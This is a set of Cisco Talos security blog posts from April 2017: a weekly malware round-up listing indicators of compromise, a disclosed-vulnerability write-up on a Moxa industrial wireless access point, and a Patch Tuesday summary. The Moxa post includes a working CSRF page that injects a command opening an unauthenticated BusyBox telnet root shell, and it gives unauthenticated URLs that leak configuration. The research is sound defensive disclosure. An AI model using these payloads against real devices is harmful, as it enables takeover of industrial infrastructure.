Threat Round-up for Mar 31 - Apr 7

April 7, 2017, 1:49 pm

≫ Next: From Box to Backdoor: Discovering Just How Insecure an ICS Device is in Only 2 Weeks

≪ Previous: Hacking the Belkin E Series OmniView 2-Port KVM Switch

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between March 31 and April 7. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your FireSIGHT Management Center, Snort.org, or ClamAV.net.

This week's most prevalent threats are:

Js.Downloader.Nemucod-6198135-0
Script-based malware downloader
Nemucod is a popular script-based downloader, often resulting in drops for Locky & Cerber. This latest variant consists of ~30-50 lines of minimized scripting code, relying on obfuscation & requests to several domains (most of which are in plaintext).
Doc.Trojan.CommentObfuscation
Macro Obfuscation Technique - Heuristic chaff
This obfuscation technique utilizes macro comments to inject data, characters, words, etc. into malicious office documents for the purposes of obscuring heuristic, static scanning. As an obfuscation technique, these droppers are being discovered delivering payloads of all sorts and sizes.
Win.Adware.Gator
Adware
Gator is common adware that is frequently bundled with ad-supported software. Gator can add toolbars to browsers, add links to the user's folders, and create popup advertisements.
Win.Worm.Allaple-6171102-0
Worm
The worm scans network subnets for connected machines. It will try to log on to machines with frequently-used credentials and copy itself to the C$ network share. The worm is polymorphic and changes its code when copying itself.
Win.Worm.Mamianune-6230992
Worm
Mamianune is an email spreading worm and file infector. It copies itself to the infected system at the %system% directory, and changes the registry to ensure persistence. It will try to spread itself through email to addresses found in files present in the system. It may also create files in the system with .htm extension.
Win.Trojan.VBEmailGen
Generic Trojan/Information stealer
This generic trojan is heavily polymorphic and it is written in Visual Basic. The main goal of this malware is to steal credentials. These credentials range from FTP logins to passwords stored in the browser. These samples perform injection and try to complicate the analysis with anti-vm and anti-debug tricks.
Doc.Dropper.Agent-6206825-0
Office VBA/PowerShell downloader/dropper
This sample is a Microsoft Word document that uses a macro to launch a PowerShell script to download and execute a secondary payload.
Doc.Macro.AliasFunc-6203108-0
Office Macro Obfuscation Heuristic
Office macro code is used to further compromise a target system. Macros can leverage external Win32 APIs to download files, write or modify files, connect to servers, etc. This signature looks for imported function that are aliased for malicious intents.
Doc.Macro.wScriptObfuscated-6203135-0
Office Macro
Office macros can provide functionality to download files, however, to accomplish this certain functionality it used. To prevent basic detection techniques macro developers obfuscate the way they create and access API required to perform certain actions.
Doc.Dropper.Agent-5932811-0
Marco
This sample is a Microsoft Word document that uses a macro to launch a PowerShell script to download and execute another executable payload. Unfortunately, this secondary payload was unavailable at the time of this execution report.

Js.Downloader.Nemucod-6198135-0

Indicators of Compromise

Registry Keys

HKEY_USERS\Software\Microsoft\Windows\ShellNoRoam\MUICache
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager
HKEY_USERS\<USER>\shell\open\command
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\OSUpgrade

Mutexes

\BaseNamedObjects\Global\C278B16ED3FB49FB
\BaseNamedObjects\FDDC561D84D621F8
\BaseNamedObjects\shell.{18D0266F-2D74-3F5C-79BE-40E45584D13C}
\BaseNamedObjects\18469BB796AF13B3

IP Addresses

62.113.208.114
37.140.192.161
195.29.89.23
195.141.45.95
86.109.170.121
78.40.108.228
109.234.161.38

Domain Names

vip-charter[.]eu
gipnart[.]ru
zivogosce[.]com
evro[.]ch
fp[.]amusal[.]es
applecitycareer[.]com
horizons-meylan[.]com

Files and or directories created

%APPDATA%\d2f225f\045b126.356b036e
%APPDATA%\d2f225f\8dcb019.bat
%TEMP%\exe1.exe
%SystemRoot%\system32\config\WindowsPowerShell.evt

File Hashes

a7d5a8786bef4bcdd5786e347277f84ff8c1da90ddea0a3c85ccb367aa22b630
59ffaa34c8445555a2b65e67f991870a04f17524e3023ceec338dcda7f33c99c
5ca09f901b1a0996e0aa8d027928503eb8ef107ae69eb7771b466706f7f3a27d
c6a97bc59e99bd19ce5134df7469b770ca734a39e6e83ddfe8282be33928aeac
dae57172401bb726a28c4317cefc475ebf662c62a04e60bb6da462a31f921fb7

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Doc.Trojan.CommentObfuscation

Indicators of Compromise

File Hashes

14f79bd9dd171ebe7ad96d0fb799bf7afd492a51f32a2bcb5594a84b2beb7ddf
3d14e2ae06a16db70e9d7d7495be830703d8f3da1aeebfadf2831782b479e726
5fd368dac325e282cc8fb2f70f0f003425881bc9615adc7ae23420996dbd4ece
94d92f9a7a0de39363089d243ac6249d66a8a803532821d8d260ccd9c86a2017
9a4957219e6f48262e54bc660c37d40d79ef98abfae95f8942e734fdb92ce6f9
ae892ee8cfc3685d78182dfd6b31a6f7691e9892c727bf2016e4764f6ec3eb84
cbf86eef9d0b22d28a46ba309172dca58f7c0d98986cba1ebd3fa47e4aaa0783
Cf17ab33a117d24bf64a83f7604ed6e125e3a3c7c9e4a6af274058ee4d2bada3

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Adware.Gator

Indicators of Compromise

Registry Keys

HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\Trickler
HKLM\SOFTWARE\QWERTYUIO\TRICKLER\AppPath
HKLM\SOFTWARE\QWERTYUIO\TRICKLER\OldTrickler
HKLM\SOFTWARE\CLASSES\CLSID\{21FFB6C0-0DA1-11D5-A9D5-00500413153C}

Mutexes

IP Addresses

Domain Names

Files and or directories created

C:\TEMP\<original_filename>.exe
C:\TEMP\<original_filename>_3202[a-z].exe

File Hashes

611497aab19c41edd874cc8a2749343ab266ca11c498cb2d149101f7ae4efa4c
52cd00a58dde64c67971d7c88fdb486a6bdfdecd158d3be3aac0cd7fe26a75be
531ad4d1eedb21e43a97223475d84e161e635ead793c67ec649d6b848699bd54
f4785012bea82b1c843383f2a579644cbb2dd2929740f3f3e31890a016db4e07
6453bd44b7d459b9c3920f55f35dfe673d22b337332b8a6c60427c668d635723
34e667fc845cdfed918cf3e04a998ec4453a1162931e341a83a0fcb3cbb26cfe
b672f6b44cd0a1482d63c20f5d1ed2bbbdb0764b5cfaff2526e062be4868973c
b0667ceb4931e8174b08b01005082f725eae6853041b80d4dc4bb30f64200fc3
4b44d48de8f6f53a7a49fc83e210cdb82a6f2f6112c557e114eda00876e56198
35cf22dcf978e5e712962680153b6f6e824ee15de845f1e94abd2cc9ef9575d4

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Worm.Allaple-6171102-0

Indicators of Compromise

Registry Keys

Creates class IDs which point to the malware binary. The CLSID varies, and points to the dropped worm binary

HKLM\Software\Classes\CLSID\{A18CE63E-6C47-00A5-8688-927B7EB5E2B5}
HKLM\Software\Classes\CLSID\{A18CE63E-6C47-00A5-8688-927B7EB5E2B5}\LocalServer32

Mutexes

\BaseNamedObjects\jhdheruhfrthkgjhtjkghjk5trh
\BaseNamedObjects\jhdheddfffffhjk5trh

IP Addresses

Domain Names

Files and or directories created

C:\I386\COMPDATA\[a-z]{8}.exe
C:\Program Files\Adobe\Reader 8.0\Reader\HowTo\ENU\[a-z]{8}.exe
C:\Program Files\Adobe\Reader 8.0\Reader\adobe_epic\eula\en_US\install.html
C:\Program Files\Adobe\Reader 8.0\Reader\HowTo\ENU\WS[0-9A-F]{8}-[0-9A-F]{4}-[0-9a-f]{4}-[0-9A-F]{4}-[0-9A-F]{12}.html

File Hashes

The worm is polymorphic and creates a new binary each time it copies itself to a new machine. The given hashes are just examples of worm binaries.

044020f369542e3ef8e6e3d1697904cdf9484c9382bae0e9a5e637056bada5b3
06d7258355f841ceb8ef0f444785eff6886fb16b5f60303c4321dfdd57b5debd
08bd26a0b0a1c4ae70fa72cf1efe6e0a1b908bc34e05f1b861c6aa3a3e1fec2c
3ea6d5f924fc9bd3dd55a97c62a8be2ef52142003a5ef298552a494ba7c837ea
4ca685cf021aa8c1fbd93f6bca7264a733f577cf86a0f1d132db179c4a45fa76
7a6facb36eab78bab5378f800ef44fa4fc955ed41de0eeafd8769dc968d96e9c
7fece8b506810686e2fe5ae34efa773b1abda48e3b175e3c4d5d957e6e8c4b55
8e5c4063c4b384b5e2e07035f69e66c16e93fe78cd4d2162dd092f118f83e6c4
926edb2df49ac87e7f57dc7283f57a2f2c0296817dc5332b7ba88142ae732127
9c0f09e6013af7e9fbaf847506b7e329f37923179447665f6c94340b2d269e79
a4dd532c71f0f802c313f12e971349c8f06b273cfcf85458fe1d0f45a3a78a75
b64e6c26a213a5bb955155e009c4fd31b697761e992fd040da98459611a0afef
ba92b52950a1f41a4b00022bb119ff8f8680d67bd73c4971a83fc71cc045b1f7
cba4e590a5dec97562c19c99337c31891558621d9e462ccf176831bc67e73601
d87de7d2adc271d20dad6ccf8b606a3bba1a3dbbc1d32726bb2482d856e8bac4
de0c9b69b5d20fa75813dfca45e6c9dc619c794e26785dca8e6cb810896ec20e
e8617de08bd8da781992099073c7f7a5f8e682f63ed0ad7575fbc1903170887a
eea5674aa53774cde05f098415a07761ad45d20fc5f1d143c04c1010f6239462
f673c0be7d8a164cc49601746616aa784e3420202e94f1a56fc1a9c94cdea8da
ff63a199a865ab203218523b1bbb90bac9f282bf1abbf9b3887411b6934dc2d9

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Worm.Mamianune-6230992

Indicators of Compromise

Registry Keys

HKEY_USER\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

Mutexes

[a-z0-9]+ E.g.: jhdheruhfrthkgjhtjkghjk5trh

Files and or directories created

Will infect modify any executable found on the system.
May create files on the system: [a-zA-Z0-9].htm

File Hashes

08858fd01702c814b5524988ab8c0802c8c66990559bbb68081c592251b9a133

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Trojan.VBEmailGen

Indicators of Compromise

Registry Keys

HKEY_USERS\Software\WinRAR\HWID
HKEY_USERS\Software\WinRAR\Client Hash

Mutexes

IP Addresses

192.3.140.114
192.3.140.121
62.108.34.122
Numerous other IP addresses can be associated depending on the sample

Domain Names

slynny[.]usa[.]cc
expresslimco[.]usa[.]cc
limvat[.]usa[.]cc
*[.]usa[.]cc

Files and or directories created

\samr

File Hashes

024df78f71a7974a33611a17ce6e552c5c33c8bf9c63a2a3286260cb7024ecc2
0b949c2da04adb63a0b2b2ab879d55bd18e870a867b703e2c6d2099e44a4a1d6
126195829847422118cf942572388a6d57d29a1d4c4bdb61ddac6f9c41b829bd
1540943aa8da93cf72deb4d0b032696cf62fefd43d9e57266291583e99b4d62e
159f524d461df27925e0f6730a0f275d5751f2216932de120b3ddb4a0dc6a3e6
26a4396750bfe364c9843dcada3cccdd148667115b5b9606803e68b17bd7182c
27c393ba6411561f57342dc22ae4392b21292d4ed56e54f4aa2c486a1cfaf416
3e245c3e12d86e74a1a679ea41354a9c130de66f7cba27c68314f4ed1c9833c1
417438c96804eaa6748d90ddacea232600733c0fca293e2f8b18934425159c2d
43d87148fad6c0a9cc94019626670622889a95e6e12f4bec22a63ee2549f077c
54583a611eb881e755caf34379db0ab49030aa50c17a3eb4e09519a36740d61e
5a37dbecf825521597ec511ae03e854c8000c9b6220db8f10bf18415fa856a90
5e25b891306342a02c2d744381bb5429823430a8ad7297dd53a0b61feaf64e38
8153c480b72455c5e03f3e5322f603962f9d23532a849318c8a30a6f63a61d3c
83df6d5fdb6371d45c4ab2dd333fc7ab4b1c1a729926720006cc250355198fbc
86f5d1ff6049450eb53c9ba28cdf2ad26087def29e4f34f56f835390aca0058e
b4ba641367f66c48859229c6039b6ebab89b21cd86ff4c169c4cfdc411663654
c3f622584222c8a97614ab1b210bdbe3c67d21de6d51c1c583bd29e3ad0c30f9
d2e07f91f7edb89707c1d314b69678b56aaf0edb4ab8d30047fad4d2b782332a
df742a83513a3537b451d7cb8598398a6be849e0cb3ee886e7be59c69d12c780
f6ba14b376c96abda2444fb555951674e4cb589b3943652e01c4fd44b1a2e71b

Coverage

Screenshots of Detection

AMP

Umbrella

ThreatGrid

Doc.Dropper.Agent-6206825-0

Indicators of Compromise

URLs

/file/cet.ert?showforum=12.0

IP Addresses

62.109.7.232
185.163.45.27

Domain Names

melodifix[.]pl
newfaund[.]pl

Files and or directories created

%TEMP%\programming.dll
%TEMP%\YarnMavin

File Hashes

Acb997996c74749f073a83ebb852e7396d546cd692f2590c78e5dbe40c86c725
BB4D13340B82060A7F300A8408CA4533A51017318A5FBCBC40FA49E156367108
B51701FCF002CFFCC361A7E111AFF2A19FD98E591DF61D1EC93C641CE5FA1CB1
003cc8bae434d0bf7dc3fae1d5b7dc35e66251540c0fbcc025ed6e9471b9756a
025976cfbf9192f813bb19b182aa7df5a578e6c55edb44be1b59d4529900cce0
02946a61761581336f31fdc8e933e577324395da77a104ab26badc50649efb23
039ba8310975624d55f1e85ed931fdbe44068af5101fc21a783acd97277179ab
04070452057f5262513b2d5cf0f5fdae34410d2531a966e8fd416a5edfff0e0f
09155ce0b9b9a6c49143c7aac3ec2c693b50a3b12e14b46a7c37f6d004165013
0c9af6f03f35d4d04a568c50f1c7813abbe862865c203934982a0f173304b4c4
0cb68591ab238da5e203a7cb1e0bbb9ebddfb3906e43194819ecb0d7039f54c0
0d6d5a2c9b06f986ea468e3df1602c307bb2478155c3566bd9421901ffc0c289
0e47674ac2dc230f8905be6446c077627fa5672dcf309d844580e14b87a3e42d
0fc621e81a188a89e269b4440b8c62ae5812ce7b658224fd45628a0c3a983b88
10508d5e47b50be2f15a8419a214c91e6516c604dceaba66a2d06a2334bf777a
14b45db836ff1c0d7e283d0ff824013d7a48c59d3805c20cf9a4c61106256fe4
155d7611a75392ead0d69df77ce4be4e72235dfd3c5e10b9bb850da5a57cbfc6
18224d2e924945aea1b73f89fe10e3c8e64dab1f50233e56fdb279fd172b010e
1b375ba7912e96821e9b5706a25f3a0411898f2cc3f9690b3e12fca84fac1e15
1bb1a1b58db0b6c9e0946b3ced3d576fd057c0365141968a43dec6c72d1d511a
1e303941e1b520d962080164ad54a75c0cf25aa53f80effb2891708869495bbd
1f8558ae8a8f11afa0e6bcb4b9a8bdc20e9b98efdc63f44e088802befebb570e
20a46289b115d2258dd9d0217729e8828664358a3c81653458fb17271a99f171

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware Screenshot

Doc.Macro.AliasFunc-6203108-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

Domain Names

Files and or directories created

File Hashes

76683b6d9be9a5595f857f612919cd0e9fe58b24c8db977522c21eee4e7c612b
84ab92e565c0eadee1e2da2dd8c55d82b356330786acbd088d5eced779eaecf4
eac422d2a54bab4305cc313fa8682f33715ecd5b3c03a7a82883dd19282100e7
5553e39dcd0d8b91e1b2a2829201e3b994457c7ffbcc6d2d8f87c860f2462877
485aaa99469550cdbb5542cd43cc0f5318017ada250c2fe7c8ba6e2d5d2693b0
d26c4d26b044cd2f19fbf8b039c7c57328aa3e4ce12bc5c604ad9ff59512fc69
8f09461b86e819c67d138c44d2cc94287af56b691e96c5515853f0273a2daa08
B4fc5bdb79eac839cb285ac7b3bbccd679e8e4776bde3947beb86d0c6ce07bf5
28eafbd69faed61103d8334d78a6f18512cf8fa5e61a08bb554fbd3bff6d5222
fd0c2c8213e97cebf0b627627634db07cdc610f3f79bc9b0b239fa9b4a540b39

Coverage

Screenshots of Detection

AMP

ThreatGrid

Malware Screenshot

Doc.Macro.wScriptObfuscated-6203135-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

Domain Names

oceanshipforafrica[.]gdn

Files and or directories created

File Hashes

2b0aca97ac42bca58ed6abdf81bab340825da442291bc15d1c5a22ee7e8b009f
7ddfffd8b5827d09f93e4ba9da2f3cfe965fe7e5fb8ec680856c12dc024b7827
7a72bad05f9d4bd653c131fcf800cd0ad21eb179597d398f2e49963ff86a0c4f
7ca81591a87ed9ac1d9b2a02a7a1a64394f52f138108b190db83a49b6db35d36
190496d6b2db946d2342ece0bd0d1addf20bb15234d07934c6ec55a52e7dcb0e
37a57d36516a29996282f1999bbd0d0184ebc82ed7975155345a93d7c0d26fb9
a237af78f7b3e81d060d3d1ae6edf22706c8815c88cc1b93a1b0ee759897a54a
2feecb7d931b2d16af9a7ced7bbf7c08f91ea404dd6034c13040d814462ffc5d
c60fad4b7ff90f58d3e1be3a9f3a3a75de82727520553e23c264208e0f51f248
D1563a9faa9590dafc097936cef24b406359da72e2dd3accca7bf697732cdae8

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Doc.Dropper.Agent-5932811-0

Indicators of Compromise

IP Addresses

5.154.191.172

Domain Names

iuhd873[.]omniheart[.]pl

File Hashes

02af015f85bca96b018e8ff7e9c0a2a7e32fc71ccc9620eb31063e8488fe6acf

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware Screenshot

↧

From Box to Backdoor: Discovering Just How Insecure an ICS Device is in Only 2 Weeks

April 10, 2017, 9:11 am

≫ Next: Microsoft Patch Tuesday - April 2017

≪ Previous: Threat Round-up for Mar 31 - Apr 7

This post was authored by Martin Lee and Warren Mercer, based on research conducted by Patrick DeSantis.

Industrial Control Systems provide stability to civilization. They clean our water, deliver our power, and enable the physical infrastructure that we have learnt to rely on. Industrial Control Systems are also highly prevalent in manufacturing. They're the robots who build your cars and assemble T.V's, they're the forklifts that ship your e-commerce purchases. As factories, utilities, and other industrial companies shift to a modern industrial infrastructure, it's vital that those processes and devices remain safe from attackers.

One key component in any ICS architecture is the access point which provides the connection between ICS devices and a industrial wireless network. Inspired by From LOW to PWNED we decided to take a look at one ICS wireless access point and see just how many vulnerabilities we could find in two weeks.

The Device

The AWK-3131A is an industrial wireless access point described by the manufacturer, Moxa Americas, Inc., as a "convenient yet reliable solution for all types of industrial wireless applications." and "a Perfect Match for Your AGV (Automated Guided Vehicle) & AS/RS (Automated Storage and Retrieval System) Systems". Additionally they hint at the systems robustness.

We gave ourselves two weeks to see how many vulnerabilities we could find within this device, it was a bug hunting exercise through the eyes of an ICS researcher within Talos.

Day 1 - Scanning

The start of our investigation began with looking at what was available on the Moxa AP. This is vital to the initial research phase as it lets us determine where to focus our efforts throughout the bug hunting.

Scanning the device shows 5 open ports: TCP22 (SSH), TCP23 (Telnet), TCP80 (HTTP/Web), TCP443, (HTTPS/Web) and an unidentified service TCP5801. Further probing shows that the SSH service is Dropbear, the default SSH service for BusyBox. The Telnet service confirms that the device is running BusyBox telnetd. The port 80 and 443 service is the GoAhead webserver, which is very common in embedded devices. BusyBox is a widely used operating system providing UNIX like utilities in a small footprint suitable for ICS & IoT devices.

The device documentation describes a single default user, "admin" with the default password "root". Using these credentials we can log on via SSH or Telnet, but only to access a restricted limited environment. The fix seems to leave room for improvement.

Day 2 - Web Application

Insecure web management systems hosted on the device are a rich environment for discovering vulnerabilities, and form part of the Top 10 Internet of Things vulnerability categories described by OWASP.

The web application login page appears unremarkable.

However, looking into the code we see that the password field has a maxlength of 16 characters. Apparently, long password strings are not permitted on this system. Already this shows a weakness in the system design and makes it more likely to be susceptible to dictionary attacks.

Submitting this form calls a function, SetCookie(), included as JavaScript in the page. Additionally, a GET request is then made to /webNonce?time=<value> with the response from Date().getTime() as the <value> in the time parameter.

For example:

This meant a cryptographic nonce was being stored in the cookie and then re-used. Already we have found a serious vulnerability: Reusing a Nonce in Encryption. At first glance, this seems an arcane system vulnerability, but because of the way that the password is hashed anyone who intercepts the cookie and discovers the nonce can easily determine the password. As with many web application systems, data relating to the user's session data is saved in a cookie. However unlike most web applications, if the user logs out and then modifies the cookie, the user is logged back in without submitting a password again. With these two issues, an attacker could conduct a session fixation attack (TALOS-2016-0225 / CVE-2016-8712).

Day 3 - Cross-Site Scripting (XSS)

There are many XSS vulnerabilities in the web front end. Many of these can be used to display the cookie value to the authenticated user, which isn't too severe of a vulnerability. However we can use these vulnerabilities to craft a malicious URL which if clicked on by an authenticated user causes the cookie value to be sent to an attacker.

An attacker can only determine the user's password if they also know the nonce value. However, the nonce can be frozen at a single value if a web page is requested from the device at least once every 300 seconds. Hence, an attacker can use the stolen cookie to give themselves an authenticated session which never expires by fixing the nonce at a value that never changes.

Day 4 - Command Injection

The device contains a ping function accessible via the device's web interface. Normally, this can be used by an authenticated user to check if a network connected device is responsive. However, there is no validation of user input when specifying the IP address to ping. Entering an OS command that is preceded with a semicolon (;) results in the command being executed by the OS with root permissions. Thus, we've identified another vulnerability. However, we learned after responsibly disclosing this flaw to Moxa that someone else had identified this vulnerability. Still, it stands that we were able to find an arbitrary command injection vulnerability in the interface.

Using this vulnerability allows us to gain full access to the device by opening up our own remote shell with full root permissions.

We can connect to this shell by telnet to exfiltrate data and binaries, or modify system files, such as the password file to our heart's content.

Day 5 - XSS with Command Injection

Exploiting the same vulnerability as above but in a different way allows an attacker to craft a malicious web page, which if visited by an authenticated user opens up a backdoor.

Any authenticated user who access the following HTML causes a remote shell to start up on the device. Including the '-l' parameter to telnetd removes the requirement to ask a connecting user for a username and password, which is a specific BusyBox implementation of Telnet. Authentication is automatic and assumed.

<html>
<body>
<form action="http://192.168.127.253/forms/webSetPingTrace" method="POST">
<input type="hidden" name="srvName" value="&#59;&#32;&#47;bin&#47;busybox&#32;telnetd&#32;&#45;l&#47;bin&#47;sh&#32;&#45;p9999" />
<input type="hidden" name="option" value="0" />
<input type="hidden" name="bkpath" value="&#47;ping&#95;trace&#46;asp" />
<input type="submit" value="Submit request" />
</form>
<script>
      document.forms[0].submit();
</script>
</body>
</html>

This cross site request forgery (CSRF) attack can be used to do many things, such as modify settings or even reset the device to factory defaults. Yet another vulnerability (TALOS-2016-0232 / CVE-2016-8718).

Days 6 & 7 - weekend!

Saturday, Sunday, Happy Days!

Day 8

Day 8 yielded a critical vulnerability, TALOS-2016-0231. We're not able to disclose the details of this flaw at this time as we are still working with Moxa to make sure this is addressed before we release details.

Day 9 - Leaking Configuration Information

There are several interesting URLs and other "features" of the web application which will return potentially sensitive information, even without authentication. For example, visiting the page /asqc.asp will reveal information such as system uptime, firmware version, BIOS version, and other details that may be of use to an attacker (TALOS-2016-0236 / CVE-2016-8722).

Alternatively, the file "systemlog.log" is available at the web root without authentication (TALOS-2016-0239 / CVE-2016-8725).

However, more interesting to an attacker is the "onekey" functionality (TALOS-2016-0241 / CVE-2016-8727) . Visiting the below URLs, in the below order, will retrieve a zip file that contains device logs and configuration information. Authentication is not required.

First: http://<Device IP>/makeonekey.gz

Then: http://<Device IP>/getonekey.gz

The config.ini file contains encrypted passwords, wireless credentials as well as firewall rules, MAC address filtering details, SNMP details, routing and VLAN info.

Day 10 - Intentional Information Exposure

Moxa provides a Windows utility called "Wireless Search Utility" which allows admins to do things such as change the device IP address, cause the device to emit a "beep" sound so that it can be physically located, pull configuration details, and upload new firmware. Observing normal network traffic between the device and the application shows broadcasts to UDP 5800 in search of Moxa devices. Devices on the broadcast network respond with basic device details. An attacker can use this application to obtain sensitive information about device configuration. The protocol is relatively easy to figure out and shares some similarities with a Moxa protocol other researchers have investigated on other devices (one example). Since this is a proprietary protocol/service that is unlikely to be modified by the vendor, we'll abstain from releasing any details that may reduce an attacker's workload.

Day 11 - Denial of Service Attack

Every basic web application analysis tool performing any action more involved than spidering causes Moxa web application to crash. For example, sending an HTTP GET request for any characters and/or strings without preceding them with a / causes the web server to crash (seg fault) (TALOS-2016-0237 / CVE-2016-8723).

Day 12 - Another Command Injection Vulnerability

In addition, the filename parameter on /forms/web_runScript is also vulnerable, and exploitable by an authenticated user. However, to be able to exploit this vulnerability implies that an attacker can already upload and execute files, so the vulnerability in this form is essentially useless from a practical perspective. Nevertheless, it is still a new vulnerability.

Day 13 - Old Cryptography

The version of OpenSSL (1.0.0d 8 Feb 2011) that is used by the web server is outdated and likely vulnerable to several attacks. Nmap suggests that this version is susceptible to CCS Injection (CVE-2014-0224), POODLE (CVE-2014-3566), using disabled ciphers (CVE-2015-3197), and DROWN (CVE-2015-3197).

Not unexpectedly, the nmap scan that produced the above results also crashed the web server on the device. By now we were short on time and couldn't verify the presence of these vulnerabilities on the device.

Conclusion

Our research demonstrates how many vulnerabilities can be quickly discovered by analyzing a device. There is nothing to suggest that this device is more or less vulnerable than any other. Indeed, the vulnerabilities we discovered are exactly the types of vulnerabilities likely to be discovered on any ICS device.

Moxa Americas, Inc. was cooperative with us throughout the disclosure process of the discovered vulnerabilities by providing us the source code of their BusyBox implementation, covered under GPL2. Moxa has released the appropriate fixes for these vulnerabilities in their latest patch found here. Another forthcoming fix for TALOS-2016-0231 is expected in the near future.

Not all manufacturers are likely be as responsive as Moxa. Nevertheless, even without the source code, treating the device as a 'black box' we were able to gain full privileges on the box within a few days of testing.

Like any system, remediating software vulnerabilities requires applying patches to update the system code. Promptly patching ICS devices is not always easy. It's not always clear what components an ICS system is built from, notifications don't always reach system managers, and methods of applying an update may be difficult because the systems may be vital to a process that can't suffer an outage.

Designing ICS infrastructures requires considering that the many of the components within the system may come with vulnerabilities such as these as standard. The Purdue Model for Control Hierarchy is an excellent resource for proper ICS network segmentation, and can make exploitation more difficult. Understand your data flows and necessary ports to ensure a secure and smooth running ICS network.

Coverage

Talos has written Snort rules to detect exploitation attempts for these vulnerabilities. System administrators should be aware that these rules are subject to change pending new or additional information regarding this vulnerabilities. For the most current information, we recommend customers review their Defense Centers or visit Snort.org.

Snort Rules: 40758, 40820-40822, 40880, 40916, 41085, 41097, 41102-41105, 41220-41223, 41352

The presence of unknown executable files, which may be malicious can be detected by using solutions such as Cisco Advanced Malware Protection (AMP).

↧

Microsoft Patch Tuesday - April 2017

April 11, 2017, 8:11 pm

≫ Next: Cisco Coverage for CVE-2017-0199

≪ Previous: From Box to Backdoor: Discovering Just How Insecure an ICS Device is in Only 2 Weeks

It’s that time again! Today we bring you April’s Microsoft Patch Tuesday information. These fixed vulnerabilities affect Outlook, Edge, Internet Explorer, Hyper-V, .NET, and Scripting Engine.

Bulletins Rated Critical

CVE-2017-0106 outlines a vulnerability in Microsoft Word. It permits the bypass of
security features when document loading is done via Outlook attachments for
certain crafted emails. Successful exploitation of this issue may grant an
attacker remote code execution.

CVE-2017-0158 details a vulnerability caused by certain malicious HTML files with VBScript content. Successful exploitation of this issue may grant an attacker remote code execution.

CVE-2017-0160 outlines a compromised WMI server accessed over DCOM using System.Management classes or the Powershell Get-WmiObject Cmdlet, which can lead to arbitrary .NET serialization remote code execution.

CVE-2017-0199 details a remote code execution vulnerability exists in the way that Microsoft Office and WordPad parse specially crafted files. An attacker who successfully exploited this vulnerability could take control of an affected system and could then install programs; view, change, or delete data; or create new accounts with full user rights.

CVE-2017-0200 covers a remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user.

CVE-2017-0201 details a remote code execution vulnerability exists in the way that the JScript and VBScript engines render when handling objects in memory in Internet Explorer. Due to a Javascript type confusion bug which exists it is possible to corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

CVE-2017-0202 outlines a type confusion vulnerability that exists in Internet Explorer which results in an Out-of-Bounds read.

CVE-2017-0205 details a render format type-confusion vulnerability in Edge 11 on Windows that causes an access violation. Successful exploitation of this vulnerability could lead to arbitrary code execution.

Bulletins Rated Important

CVE-2017-0155 outlines an out-of-bounds memory write vulnerability in Windows DDI (Device Driver Interface) that affects Windows and causes a kernel crash.

CVE-2017-0156 details a NULL-dereference vulnerability was discovered in Windows. The root cause of the vulnerability is in dxgkrnl.sys, which runs in kernel mode. Successful exploitation of this vulnerability can result in EOP (Escalation-of-Privilege) in older Windows versions.

CVE-2017-0165 covers an arbitrary directory / file deletion elevation of privilege vulnerability in IEETWCollector that affects Windows 10. Successful exploitation of the vulnerability could lead to arbitrary code execution.

CVE-2017-0166 details a buffer overrun vulnerability in Microsoft LDAP implementation.

CVE-2017-0167 outlines an uninitialized memory read vulnerability in Windows kernel. Successful exploitation of the vulnerability could result in potential information leakage.

CVE-2017-0188 outlines an Integer overflow in Windows Graphics Device Interface (GDI) which causes an out-of-bounds read resulting in a kernel crash.

CVE-2017-0189 details an out-of-bounds write vulnerability in Windows DDI (Device Driver Interface) that when successfully exploited causes a kernel crash.

CVE-2017-0192 outlines an out-of-bounds read that affects the ATMFD (Adobe Type Manager Font Driver) in Windows.

CVE-2017-0194 details an out-of-bounds memory read vulnerability which exists in Excel.

CVE-2017-0197 covers a vulnerability in Microsoft Office OneNote 2007 that is vulnerable to DLL sideloading, which an attacker could leverage to gain remote code execution.

CVE-2017-0204 outlines a vulnerability was discovered in Microsoft Word which permits the bypass of security features when document loading is done via Outlook attachments for certain crafted emails. Successful exploitation of this issue may grant an attacker remote code execution.

CVE-2017-0210 details a vulnerability in Internet Explorer 11 htmlFile ActiveX control that results in a universal cross-site scripting (UXSS) condition.

CVE-2017-0211 highlights a privilege escalation vulnerability in Microsoft Windows OLE which could allow an application with limited privileges on an affected system to execute code.

Coverage

In response to these bulletin disclosures, Talos is releasing the following rules to address these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Management Center or Snort.org.

Snort SIDs: 41962-41963, 41997-41998, 42148-42151, 42152-42168, 42173-42174, 42183-42190, 42199-42200, 42204-42205, and 42208-42211

↧

Cisco Coverage for CVE-2017-0199

April 14, 2017, 11:54 am

≫ Next: Threat Round-up for Apr 7 - Apr 14

≪ Previous: Microsoft Patch Tuesday - April 2017

